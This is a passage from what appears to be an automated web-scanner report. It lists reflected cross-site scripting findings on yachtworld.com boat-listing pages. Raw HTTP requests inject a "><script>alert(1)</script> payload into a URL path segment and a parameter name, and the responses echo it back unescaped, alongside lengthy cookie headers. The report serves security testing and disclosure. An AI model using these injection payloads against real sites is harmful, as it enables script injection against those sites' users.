savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:42 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:41 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
ref="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FLeb59c"><script>alert(1)</script>7529dd0e55/United-States&boat_id=2255088">
...[SNIP]...

3.111. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d3f"><script>alert(1)</script>4f5ae1f7ad8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-Statesc1d3f"><script>alert(1)</script>4f5ae1f7ad8 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:17 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:16 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
ting/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-Statesc1d3f"><script>alert(1)</script>4f5ae1f7ad8&boat_id=2255088">
...[SNIP]...

3.112. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 588f2"><script>alert(1)</script>9c458a9cc4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States?588f2"><script>alert(1)</script>9c458a9cc4e=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:52 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:52 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2